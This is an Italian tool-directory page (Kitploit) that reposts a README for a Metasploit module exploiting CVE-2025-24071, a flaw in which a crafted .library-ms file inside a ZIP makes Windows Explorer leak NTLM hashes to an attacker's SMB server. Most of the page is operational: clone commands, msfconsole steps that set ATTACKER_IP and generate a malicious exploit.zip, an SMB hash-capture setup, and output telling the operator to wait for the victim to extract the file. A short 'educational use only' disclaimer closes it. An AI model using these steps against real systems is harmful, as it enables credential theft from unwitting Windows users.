Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Blackash-CVE-2025-24071 — CVE-2025-24071 | Kitploit
Strumenti/GitHubGitHub/zbs54/blackash-cve-2025-24071
Framework di ExploitGenerazione di PayloadAnalisi delle VulnerabilitàExploitRaccolta InformazioniPenetration Testing
GitHubzbs54/blackash-cve-2025-24071

Blackash-CVE-2025-24071

CVE-2025-24071

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Blackash-CVE-2025-24071

CVE-2025-24071: Fuga di hash NTLM tramite file .library-ms, Modulo Metasploit 🚨

Descrizione

L'esposizione di informazioni sensibili a un attore non autorizzato in Windows File Explorer consente a un attaccante non autorizzato di eseguire spoofing su una rete.

Metriche

CNA: Microsoft Corporation Punteggio base: 6.5 MEDIUM 🟠 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Panoramica

La vulnerabilità si verifica quando un utente estrae un archivio ZIP contenente un file .library-ms appositamente creato. Windows Explorer avvia automaticamente una richiesta di autenticazione SMB a un server remoto specificato nel file, causando la fuga dell'hash NTLM dell'utente senza alcuna interazione.

Questo modulo Metasploit:

  1. Genera un file .library-ms malevolo.
  2. Lo inserisce in un archivio ZIP.
  3. Si integra con la funzionalità di cattura SMB di Metasploit per raccogliere hash NTLM.
root@kitploit:~
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
        https://metasploit.com


       =[ metasploit v6.4.64-dev                          ]
+ -- --=[ 2519 exploits - 1296 auxiliary - 431 post       ]
+ -- --=[ 1616 payloads - 49 encoders - 13 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > use auxiliary/server/ntlm_hash_leak
msf6 auxiliary(server/ntlm_hash_leak) > set ATTACKER_IP 192.168.1.1
ATTACKER_IP => 192.168.1.1
msf6 auxiliary(server/ntlm_hash_leak) > set FILNAME exploit.zip
FILNAME => exploit.zip
msf6 auxiliary(server/ntlm_hash_leak) > set LIBRARY_NAME malicious.library-ms
LIBRARY_NAME => malicious.library-ms
msf6 auxiliary(server/ntlm_hash_leak) > set SHARE_NAME shared
set SHARE_NAME => shared
msf6 auxiliary(server/ntlm_hash_leak) > run
[*] Malicious ZIP file created: exploit.zip
[*] Host the file and wait for the victim to extract it.
[*] Ensure you have an SMB capture server running to collect NTLM hashes.
[*] Auxiliary module execution completed

Installazione:

  1. Clona il repository:
root@kitploit:~
git clone https://github.com/B1ack4sh/Blackash-CVE-2025-24071.git
cd CVE-2025-24071

Utilizzo:

  1. Carica il modulo:
root@kitploit:~
use auxiliary/server/ntlm_hash_leak
  1. Imposta le opzioni richieste:
root@kitploit:~
set ATTACKER_IP 192.168.1.162           # Sostituisci con il tuo indirizzo IP
set FILENAME exploit.zip                # Nome del file ZIP malevolo
set LIBRARY_NAME malicious.library-ms   # Nome del file .library-ms
set SHARE_NAME shared                   # Nome della condivisione SMB
  1. Esegui il modulo:
root@kitploit:~
run
  1. Il modulo genererà un file ZIP malevolo (exploit.zip). Ospita questo file affinché la vittima lo scarichi e lo estragga.
  2. Utilizza il modulo di cattura SMB di Metasploit per raccogliere gli hash NTLM:
root@kitploit:~
use auxiliary/server/capture/smb
set SRVHOST 192.168.1.162  # Stesso di ATTACKER_IP
run

Avvertenza ⚠️

Solo a scopo educativo e di ricerca. Utilizzare solo su sistemi di tua proprietà o per i quali hai l'autorizzazione al test.

Scarica lo strumento